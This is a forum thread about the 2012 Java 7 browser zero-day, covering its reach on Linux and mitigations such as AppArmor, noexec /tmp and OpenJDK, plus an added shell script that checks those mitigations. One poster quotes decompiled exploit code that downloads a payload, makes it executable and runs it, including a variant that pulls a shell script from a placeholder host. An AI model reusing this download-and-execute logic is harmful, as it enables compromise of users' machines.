KodiacZiller
Premium
join:2008-09-04
73368
kudos:2

Java 7 0-day

The newly discovered Java 7 0-day works on Linux (at least on the default install of Ubuntu 12.04). Tested it earlier with a VM and Metasploit. It works on both Firefox and Chromium (it bypasses the Chromium chroot sandbox, though I am not sure if Chromium sandboxes Java in the first place). However, I don't *think* it works with OpenJDK. At any rate, if you are using Oracle's official Java 7 in your browser, you can be compromised by merely visiting a malicious page (no user interaction required). Luckily, at least for Ubuntu users, Oracle's Java is not in the repos. You must install from a PPA.

I also tested it against the AppArmor profile that comes with Ubuntu and AppArmor killed it cold, so I highly recommend using AppArmor, SELinux or Grsec on a desktop box, at least for the browser. Unfortunately, Ubuntu no longer comes with the AppArmor profile enabled by default, so you have to do it yourself (and make a few tweaks to the profile).

And NX/ASLR/RELRO does not stop it since it doesn't work via memory corruption. It works on both 32 and 64 bit as well.

Since it may be a while before this is patched by Oracle, I thought I would give a heads up, especially since it is already in Metasploit. Obviously this means the script-kiddies will be running wild with it in no time.

The exploit doesn't get root, but that's not needed to connect to a remote server without one's knowledge.

It also affects Mac and Windows users too, of course.
--
Getting people to stop using windows is more or less the same as trying to get people to stop smoking tobacco products. They don't want to change; they are happy with slowly dying inside. -- munky99999



JohnInSJ
Premium
join:2003-09-22
Aptos, CA

I've not seen a good description of what this does give you - access at the current user level for the login session that's running? What about firewalls?
--
My place : »www.schettino.us



timcuth
Braves Fan
Premium
join:2000-09-18
Pelham, AL
Reviews:
·Charter
·AT&T Southeast
reply to KodiacZiller

Is there a way to prevent Java from executing without completely uninstalling it?

Is it just the Java programming language, or Javascript, too? If it includes Javascript, it will break most web pages.

What are the current (as of right now, for this exploit) best practices for protection?
--
"Life is like this long line, except at the end there ain't no merry-go-round." - Arthur on The King of Queens
~ Project Hope ~



KodiacZiller
Premium
join:2008-09-04
73368
kudos:2

said by timcuth:

Is there a way to prevent Java from executing without completely uninstalling it?

Not really, unless you disable the plugin in the browser. Or you can, as I said above, use a MAC system like AppArmor or SELinux. Java 6 is not affected, so that might be an option.

Is it just the Java programming language, or Javascript, too? If it includes Javascript, it will break most web pages.

AFAIK it is just Java.

What are the current (as of right now, for this exploit) best practices for protection?

Either disable Java in the browser or confine it with a MAC.

Of course, the chances of Linux being targeted are small, but still possible.
--
Getting people to stop using windows is more or less the same as trying to get people to stop smoking tobacco products. They don't want to change; they are happy with slowly dying inside. -- munky99999


timcuth
Braves Fan
Premium
join:2000-09-18
Pelham, AL
Reviews:
·Charter
·AT&T Southeast

said by KodiacZiller:

Of course, the chances of Linux being targeted are small, but still possible.

Thanks for your answers.

Java is cross-platform, so I doubt it will make any difference to the exploit what host system is running.

Tim
--
"Life is like this long line, except at the end there ain't no merry-go-round." - Arthur on The King of Queens
~ Project Hope ~


Maxo
Your tax dollars at work.
Premium,VIP
join:2002-11-04
Tallahassee, FL
reply to timcuth

said by timcuth:

Is it just the Java programming language, or Javascript, too? If it includes Javascript, it will break most web pages.

Java and JavaScript are common in name only.


howardfine

join:2002-08-09
Saint Louis, MO
reply to KodiacZiller

»www.theregister.co.uk/2012/08/27···exploit/

quote:
In the form in which it was discovered, the exploit only works on Windows machines, because the payload that it downloads is a Windows executable. But the hackers behind the Metasploit penetration testing software say they have studied the exploit and found that it could just as easily be used to attack machines running Linux or Mac OS X, given the appropriate payload.

Which means no method has been found that involves Linux or Mac.


KodiacZiller
Premium
join:2008-09-04
73368
kudos:2

1 edit

said by howardfine:

»www.theregister.co.uk/2012/08/27···exploit/

quote:
In the form in which it was discovered, the exploit only works on Windows machines, because the payload that it downloads is a Windows executable. But the hackers behind the Metasploit penetration testing software say they have studied the exploit and found that it could just as easily be used to attack machines running Linux or Mac OS X, given the appropriate payload.

Which means no method has been found that involves Linux or Mac.

Yeah, from my testing, the Metasploit exploit downloads a .exe to /tmp and then tries to execute it. Obviously a .exe won't run on a *nix box, but as the article points out, it would be trivial to change the payload to something *nix specific (like a shell script for instance).

You could always mount /tmp noexec, but that requires /tmp to be on its own partition. Also doing this will break a lot of apps.

The best option is to use Java 6, disable Java altogether in the browser, or lock the browser down with a MAC system.

EDIT: Also it appears OpenJDK (Iced Tea) is not affected, so most Linux users are probably safe since most don't use Oracle's official Java anyway. Ubuntu took Oracle's Java out of its repositories a while back and now OpenJDK is what is installed.

--
Getting people to stop using windows is more or less the same as trying to get people to stop smoking tobacco products. They don't want to change; they are happy with slowly dying inside. -- munky99999


BBBanditRuR
Dingbits

join:2009-06-02
Parachute, CO
Reviews:
·Comcast

said by KodiacZiller :

Obviously a .exe won't run on a *nix box

EEEEK! Stop!

»www.winehq.org/

... the effects of which...

are unknown...


howardfine

join:2002-08-09
Saint Louis, MO
reply to KodiacZiller

said by KodiacZiller:

it would be trivial to change the payload to something *nix specific (like a shell script for instance).

But how would that be executed without permissions?

@BBBanditRuR - Same answer. That was created with the Windows ABI and can't run on a *nix machine no matter how hard one tries.


JohnInSJ
Premium
join:2003-09-22
Aptos, CA
reply to KodiacZiller

said by KodiacZiller:

said by howardfine:

»www.theregister.co.uk/2012/08/27···exploit/

quote:
In the form in which it was discovered, the exploit only works on Windows machines, because the payload that it downloads is a Windows executable. But the hackers behind the Metasploit penetration testing software say they have studied the exploit and found that it could just as easily be used to attack machines running Linux or Mac OS X, given the appropriate payload.

Which means no method has been found that involves Linux or Mac.

Yeah, from my testing, the Metasploit exploit downloads a .exe to /tmp and then tries to execute it.

Which would run as the current user, even under windows - which should (if the user isn't running as Admin, or hasn't disabled UAC) raise all sorts of alarms if it does something needing permissions.
--
My place : »www.schettino.us


BBBanditRuR
Dingbits

join:2009-06-02
Parachute, CO
reply to howardfine

My point is that while it may not affect the running system, malicious software *could* run on it.



FF4m3

@bhn.net
reply to KodiacZiller

Years ago I found it possible to eliminate Java from all my used OSes by switching to apps that don't require Java. So all related issues became forever nonexistent.

Naturally not everyone is able to do this but, if possible, it offers a permanent solution.



Maxo
Your tax dollars at work.
Premium,VIP
join:2002-11-04
Tallahassee, FL

said by FF4m3 :

Naturally not everyone is able to do this but, if possible, it offers a permanent solution.

I've been able to get rid of Sun Java on all but my work machine. I use SQL Developer for my database work. It runs horribly slow under OpenJDK/IcedTea.


InTheKnow

@pnap.net
reply to howardfine

Here is a snippet from the actual exploit code; those who are saying it fails to run on Linux are talking out their ass. It has Windows detection and calls chmod on a non-Windows box. The xiaomaolv parameter defines the first-stage payload and could point to a shell script, an ELF binary, etc. Folks, we run stuff in user-space; when your local user is owned, and it's the primary user you use to interface with the system, tell me again how this isn't a security concern?

I'd prefer someone not snarf my ~/

            if(bn.indexOf(k1) == 0 && si.indexOf(k2) == 0 && bs.intValue() == 748)
            {
                // first stage is written to the JVM temp dir as "update.exe"
                Object localObject1 = (new StringBuilder(String.valueOf(System.getProperty("java.io.tmpdir")))).append(File.separator).append("update.exe").toString();
                downFile((String)localObject1, xiaomaolv);
                // os.name check: on anything that is not Windows, mark the file executable
                if(str1.indexOf("Windows") < 0)
                    exec((new StringBuilder("chmod 755 ")).append((String)localObject1).toString());
                exec((String)localObject1);
                (new File((String)localObject1)).delete();
            }

Of course we could keep saying it doesn't work right?

»www.youtube.com/watch?v=Ri_Uny-ZwYk


howardfine

join:2002-08-09
Saint Louis, MO

said by InTheKnow :

Here is a snippet from the actual exploit code, those who are saying it fails to run on Linux are talking out their ass.

Well the article says it only has a Windows executable in it. There is another article around that says the same thing. I don't have time to mess with your code but how you are getting a Windows executable to run in Linux without permissions would be...unusual...to put it mildly. Not to mention doing so as non-root.

EDIT: I missed you are talking about running a script and not the executable from the malware but the same question comes about. You are saying you are able to download and execute this script as a non-root user which is highly questionable.


JohnInSJ
Premium
join:2003-09-22
Aptos, CA

I think he's saying he can download a script, chmod +x it, and run it as the current user. Which isn't exactly owning the box just yet. Next would be that the payload would execute a local root elevation (assuming you're not patched against the script kiddie list of exploits attempted in the payload).

So to recap you must be
1) dumb enough to run java in your browser (hey, it's 1998!)
2) running as root (OMG, like totally) or
3) running a system with known root elevation exploits or
4) l33t haxxors have you.

That seems to be right to me.

I think most linux users are going to be failing at 1. I think anyone with a brain should be failing at 1.
--
My place : »www.schettino.us



InTheKnow

@pnap.net
reply to howardfine

Respectfully, yes you can run the script as a non-root user, programmatically, just as any local user can, or a binary.

Two lines of code and it can be made cross-platform. I think folks are confusing the necessity of root access to "own" the system. I think we're arguing semantics here; unauthorized execution of code, even in the context of a local unprivileged user, is still "owning". If anything, owning the system as the local logged-in user gives them access to the encrypted data stores typically unencrypted during login like ecryptfs/luks.

Consider the below code, wee, look it's cross-platform:

        if(xiaomaolv == null && bn == null)
            return null;
        try
        {
            String k1 = "woyouyizhixiaomaol";
            String k2 = "conglaiyebuqi";
            String str1 = System.getProperty("os.name");
            if(bn.indexOf(k1) == 0 && si.indexOf(k2) == 0 && bs.intValue() == 748)
            {
                Object localObject1 = (new StringBuilder(String.valueOf(System.getProperty("java.io.tmpdir")))).append(File.separator).append("update.exe").toString();
                downFile((String)localObject1, xiaomaolv);
                if(str1.indexOf("Windows") < 0)
                {
                    //Wee look at me, I affect not just Windows!!
                    (new File((String)localObject1)).delete();
                    downFile((String)localObject1, "http://www.example.com/hostile_stuff.sh");
                    exec((new StringBuilder("chmod 755 ")).append((String)localObject1).toString());
                }
                exec((String)localObject1);
                (new File((String)localObject1)).delete();
            }
        }
        catch(Exception exception) { }
        return null;

These are just code snippets, I'm not going to post the whole decompiled jar/class files. Let me say the assertions of:

1) People shouldn't run Java -- I'm sorry, this is asinine. Java is security horrid, but there are enterprise applications that explicitly require it, such as Juniper's VPN client on Linux. QuickJava is a pretty good answer for a Firefox plugin.

2) Running as root; yeah they should be flogged.

3-4) A simple wget script, running in a loop, backgrounded, makes a pretty damned good resource exhaustion attack for a bot-peer. C'mon guys, we see this crap already with the SSH scans and ownage of various unpatched web-apps on LAMP boxes. Connect-back shells, complex bot-peer Perl code, stripped ELFs, etc. You don't need root to bind an unpriv socket.

Let's not be too dismissive of reality. As of now, even for Linux folks, it seems 1.6.0_u34 is the best answer, or even better is OpenJDK IF it works with the enterprise applications.

I'm half tempted to set up a POC that fork-bombs folks who haven't set up limits.conf for nproc, just as a POC to demonstrate that indeed, Virginia, there is a security concern here.


Maxo
Your tax dollars at work.
Premium,VIP
join:2002-11-04
Tallahassee, FL
reply to KodiacZiller

For those who may not know, I think it is important to note that this does not work by just having Java on your system. It must also be a browser plugin. You can install Java without giving your browser access to run it as a plug-in.



Snakeoil
Ignore Button. The coward's feature.
Premium
join:2000-08-05
Mentor, OH
kudos:1
reply to KodiacZiller

How does it work with Minecraft?



howardfine

join:2002-08-09
Saint Louis, MO
reply to InTheKnow

Well I know what you're getting at, and I agree with your points, but yes I am glossing over things.



InTheKnow

@pnap.net

No worries, this is the real deal. Linux may not be a highly targeted demographic but indeed, we are vulnerable here if using the unpatched Oracle/Sun Java 1.7.x branch and it's able to be instanced, either from a browser, or other methods. Does this mean GNU/Linux itself is on the same security plane as Windows? Hell no, it just means we've got another permutation of typical asshattery from Oracle on par with Adobe; sometimes I think they're in competition to see who can produce the most security lax, shitty, exploitable code that causes tangible dollar loss in financial fraud thanks to Blackhole/Phoenix/Redkit Exploit Kit deployments of ZeuS, Carberp, Bugats, Gozi, SpyEye, etc.

Is the sky falling? No, we're GNU/Linux folks, we're a little more aware and technical than the Win32 sheeple who still believe signature-based anti-virus is something more than security placebo. "Protection from yesterday by tomorrow".

We just need to paint a picture of accuracy here. Not targeted by 1st stage downloaders/successful exploitation payload doesn't mean we're not vulnerable and *can't* be targeted. Trivial changes to the exploitation code seen in the wild can target all three demographics AND there is a real risk of compromise even if the process is constrained to the local logged-on user.

Let's just relish the fact that we can constrain processes using AppArmor, chrooting, etc. and not have to rely on profiteering security vendors to convince us that by running their product it's "All the protection we'll ever need!"



JohnInSJ
Premium
join:2003-09-22
Aptos, CA
reply to InTheKnow

said by InTheKnow :

1) People shouldn't run Java

In a browser that blindly executes any jar file it finds. NoScript would stop this. So would not having Java installed in the browser you use when browsing porn sites, er, sites that may be exploited.
--
My place : »www.schettino.us


Ian
Premium
join:2002-06-18
ON
kudos:3

said by JohnInSJ:

said by InTheKnow :

1) People shouldn't run Java

In a browser that blindly executes any jar file it finds. NoScript would stop this. So would not having Java installed in the browser you use when browsing porn sites, er, sites that may be exploited.

I think with Firefox, running NoScript or not, all you have to do is change plugins.click_to_play to true in about:config. Then you can decide which (if any) to activate.

Is it normal that it would take this long to issue a patch?
--
“Any claim that the root of a problem is simple should be treated the same as a claim that the root of a problem is Bigfoot. Simplicity and Bigfoot are found in the real world with about the same frequency.” – David Wong
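The mitigations the thread settles on (not being on the Oracle/Sun Java 7 branch, /tmp mounted noexec, an enforcing AppArmor profile for Firefox, and plugins.click_to_play) can be audited from captured command output. The script below is an added example, not code from the thread or from any of the projects named in it; it reads the relevant text from stdin so it runs offline, and the sample inputs at the bottom are constructed, not real captures. The Java check only reproduces the thread's version-string observations; it is a heuristic, not a vulnerability test.

```shell
#!/bin/sh
# Added example (not from the thread): text-only checks for the mitigations
# discussed above. Each function reads captured command output from stdin
# and returns 0 when the named condition holds, 1 otherwise.

# 0 if "java -version" output (it goes to stderr: java -version 2>&1 | ...)
# is the Oracle/Sun 1.7 branch the thread reports as affected. OpenJDK/IcedTea
# and the 1.6 branch are treated as not affected, as reported in the thread.
java_looks_affected() {
    out=$(cat)
    printf '%s\n' "$out" | grep -q '^java version "1\.7\.' || return 1
    printf '%s\n' "$out" | grep -qi 'openjdk' && return 1
    return 0
}

# 0 if "mount" output lists /tmp as its own mount point with noexec set.
# A /tmp living on the root filesystem produces no matching line, which is
# the "requires /tmp to be on its own partition" caveat from the thread.
tmp_is_noexec() {
    grep ' on /tmp type ' | grep -q '[(,]noexec[,)]'
}

# 0 if /sys/kernel/security/apparmor/profiles lists a firefox profile in
# enforce mode (a profile in complain mode only logs, it does not block).
firefox_profile_enforced() {
    grep -i 'firefox' | grep -q '(enforce)$'
}

# 0 if a Firefox prefs.js turns click-to-play on, so plugins such as Java
# do not start until the user activates them.
click_to_play_enabled() {
    grep -q '^user_pref("plugins.click_to_play", *true);'
}

# Constructed samples (not captured from a real machine).
SAMPLE_JAVA_ORACLE='java version "1.7.0_06"
Java(TM) SE Runtime Environment (build 1.7.0_06-b24)'
SAMPLE_JAVA_OPENJDK='java version "1.7.0_03"
OpenJDK Runtime Environment (IcedTea7 2.1.1)'
SAMPLE_MOUNT='/dev/sda1 on / type ext4 (rw,errors=remount-ro)
/dev/sda3 on /tmp type ext4 (rw,nosuid,nodev,noexec)'
SAMPLE_PROFILES='/usr/lib/firefox/firefox (enforce)
/usr/sbin/cupsd (complain)'
SAMPLE_PREFS='user_pref("plugins.click_to_play", true);'

# Prints one line per check for the constructed samples.
report() {
    printf '%s\n' "$SAMPLE_JAVA_ORACLE" | java_looks_affected \
        && echo "java: Oracle 1.7 branch present (affected per thread)" \
        || echo "java: not the affected branch"
    printf '%s\n' "$SAMPLE_MOUNT" | tmp_is_noexec \
        && echo "/tmp: noexec" || echo "/tmp: exec allowed or not a separate mount"
    printf '%s\n' "$SAMPLE_PROFILES" | firefox_profile_enforced \
        && echo "apparmor: firefox enforced" || echo "apparmor: firefox not enforced"
    printf '%s\n' "$SAMPLE_PREFS" | click_to_play_enabled \
        && echo "firefox: click_to_play on" || echo "firefox: click_to_play off"
}

report
```

On a live Ubuntu desktop the same functions take `java -version 2>&1`, `mount`, `cat /sys/kernel/security/apparmor/profiles` and the profile's prefs.js as input instead of the samples.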


Maxo
Your tax dollars at work.
Premium,VIP
join:2002-11-04
Tallahassee, FL
reply to Snakeoil

said by Snakeoil:

How does it work with Minecraft?

I'm running both the Minecraft server and client with OpenJDK 7 to great avail.


KodiacZiller
Premium
join:2008-09-04
73368
kudos:2

1 edit
reply to JohnInSJ

I had a post typed and lost it.

Anyway, I was just going to reiterate what InTheKnow is saying. You don't need root to do some malicious things on a *nix box. The infamous malware for OSX that made headlines a couple of months ago didn't get root on Macs either. It was almost identical to this -- it used a Java exploit in the browser and took over userspace.

Fortunately we already have tools in Linux to make such attacks much more difficult. MAC systems (AppArmor, SELinux, Grsec) for instance. Linux, just like OSX, Solaris, and BSD, uses the traditional Unix DAC model. DAC is fine for separating userspace and root, but it does nothing to control processes *within* user space. This is where MACs come in -- they can confine user space processes from each other and can even confine the root account (so even if an attacker successfully exploits a root-owned process, he can't own the whole box).

I think MAC systems will become more necessary in the future, especially for servers. Actually, it is wise to use them now for servers. Even for desktops, it is smart to use them, at least for the browser. I find AppArmor the simplest to use, so it is my choice. Grsecurity is probably the best, but it is an animal to set up and get tweaked properly.



howardfine

join:2002-08-09
Saint Louis, MO

said by KodiacZiller:

You don't need root to do some malicious things on a *nix box. The infamous malware for OSX that made headlines a couple of months ago didn't get root on Macs either. It was almost identical to this -- it used a Java exploit in the browser and took over userspace.

I'm not sure it's the same as this, but I think I recall that being more malarkey and sky-is-falling than anything real.

I don't know. I get back from working on the Olympics stuff and now I've got a big project kicking off Monday. I don't remember anything anymore.


JohnInSJ
Premium
join:2003-09-22
Aptos, CA
reply to KodiacZiller

said by KodiacZiller:

Anyway, I was just going to reiterate what InTheKnow is saying. You don't need root to do some malicious things on a *nix box.

Userspace problems are easier to clean up. Far, far easier.
--
My place : »www.schettino.us


InTheKnow

@pnap.net
reply to howardfine

said by howardfine:

said by KodiacZiller:

You don't need root to do some malicious things on a *nix box. The infamous malware for OSX that made headlines a couple of months ago didn't get root on Macs either. It was almost identical to this -- it used a Java exploit in the browser and took over userspace.

I'm not sure it's the same as this, but I think I recall that being more malarkey and sky-is-falling than anything real.

This was dubbed Flashback, and I assure you it was both real and absolutely affected OS X. Were there alarmist news reports on it? No. Was there tangible, measurable, observed infection on a large volume of OS X computers that were seen across multiple industries with specific markers? Absolutely, and I'm speaking authoritatively (PCAPs) here, not regurgitating news articles.

said by JohnInSJ:

Userspace problems are easier to clean up. Far, far easier.

If you're aware of them. Gone are the days of severity of threat from 13 year old Filipinos releasing ILoveYou.vbs; sure there are some very clear differences between the Win32 and GNU/Linux security models but please don't be so dismissive of the ease of dropping MiTB fun when I'm looking at ~/.mozilla/.

IF (big IF here, I know your views on Java) you are using a vulnerable version of Java instanced, and it dropped a connect-back shell or egress script, how would you know it? How would you know you're doing RFC-violating DNS C2? What about egress C&C check-in over TCP 80/443? You using an explicit proxy, not transparent, with forced auth? You running DNS C2 monitoring code? Tell me about your IDS/NIDS/HIDS setup; OSSEC-HIDS using inotify() watching your filesystem? Where's your egress network tap/span port? Where are you terminating your SSL connections so you can inspect them in the clear? What alerts do you have on self-signed certs? It's easy to say "Userspace is easy cleanup" when you're aware. Tell me about your strict egress firewall; are you using IPv6? If not, are you sure you're not using a fe80 link-local address? 99% of the time the victims of financial fraud aren't aware.

I'm not trying to dismiss your response; matter of fact, if anything it highlights that GNU/Linux users are far more aware of defense-in-depth and intelligent mitigation techniques than our Win32 counterparts, but, as evidenced by others in this thread (whose thoughts I also appreciate), reality isn't as cut and dry as SOHO or home setups.

KodiacZiller, thanks for backing me up sir.


Snakeoil
Ignore Button. The coward's feature.
Premium
join:2000-08-05
Mentor, OH
kudos:1
reply to Maxo

Thank you. For whatever reason, we keep getting Java errors on our server [I'm running the server on a Windows box, I play on a linux box. The other 3 people that play on the server play on windows boxes].

I guess I'll have to wait for Technic to update their server package. Though I'll tell the kids to grab the new java update as well.
--
Is a person a failure for doing nothing? Or is he a failure for trying, and not succeeding at what he is attempting to do? What did you fail at today?